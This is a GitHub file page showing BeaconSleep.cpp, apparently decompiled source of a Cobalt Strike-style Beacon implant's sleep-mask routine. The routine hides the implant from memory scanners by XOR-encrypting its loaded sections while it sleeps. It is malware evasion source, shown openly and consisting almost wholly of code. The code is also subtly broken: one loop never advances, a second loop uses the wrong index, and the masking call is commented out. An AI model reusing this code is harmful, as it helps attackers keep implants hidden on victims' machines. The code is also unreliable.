-
Notifications
You must be signed in to change notification settings - Fork 42
Expand file tree
/
Copy pathBeaconSleep.cpp
More file actions
77 lines (75 loc) · 2.01 KB
/
BeaconSleep.cpp
File metadata and controls
77 lines (75 loc) · 2.01 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
#include "BeaconSleep.h"
SLEEPMASKP* gBeaconSleepMask;
HINSTANCE GetBeaconBase()
{
return Beacon_Dllbase;
}
PVOID SleepEncryptlpAddress;
void sub_1000436C()
{
DWORD flOldProtect;
if (!SleepEncryptlpAddress)
{
int BeaconCode = get_dword(41);
char* Beaconbase = (char*)GetBeaconBase();
VirtualProtect(Beaconbase + BeaconCode, (char*)sub_10004325 - (char*)BeaconSleepMask, 4, &flOldProtect);
SleepEncryptlpAddress = Beaconbase + BeaconCode;
memcpy(SleepEncryptlpAddress, BeaconSleepMask, (char*)sub_10004325 - (char*)BeaconSleepMask);
VirtualProtect(SleepEncryptlpAddress, (char*)sub_10004325 - (char*)BeaconSleepMask, flOldProtect, &flOldProtect);
gBeaconSleepMask = (SLEEPMASKP*)malloc(sizeof(SLEEPMASKP));
gBeaconSleepMask->BeaconBase = (char*)GetBeaconBase();
gBeaconSleepMask->sections = (int*)get_str(42);
random_bytesarray((BYTE*)gBeaconSleepMask->mask, 0xDu);
}
}
void BeaconSleepMask(SLEEPMASKP* parms, pSleep psleep, int time)
{
int* index = parms->sections;
while (true)
{
int a = index[0];
int b = index[1];
if (!a && !b)
{
break;
}
for (; a < b; ++a)
{
parms->BeaconBase[a] ^= parms->mask[a % 13];
}
}
psleep(time);
index = parms->sections;
while (1)
{
int a = index[0];
int b = index[1];
index += 2;
if (!a && !b)
{
break;
}
for (; a < b; ++a)
{
parms->BeaconBase[b] ^= parms->mask[b % 13];
}
}
}
void sub_10004325()
{
sub_1000436C();
}
void BeaconSleep(unsigned long dwMilliseconds)
{
//²»ÊÇ·´Éädll²»ÓÃ
if (get_dword(41) && BackgroundThreadsNumber <= 0)
{
//sub_10004325();
//((void(__cdecl*)(SLEEPMASKP*, void(__stdcall*)(DWORD), DWORD))SleepEncryptlpAddress)(gBeaconSleepMask, Sleep, dwMilliseconds);
Sleep(dwMilliseconds);
}
else
{
Sleep(dwMilliseconds);
}
}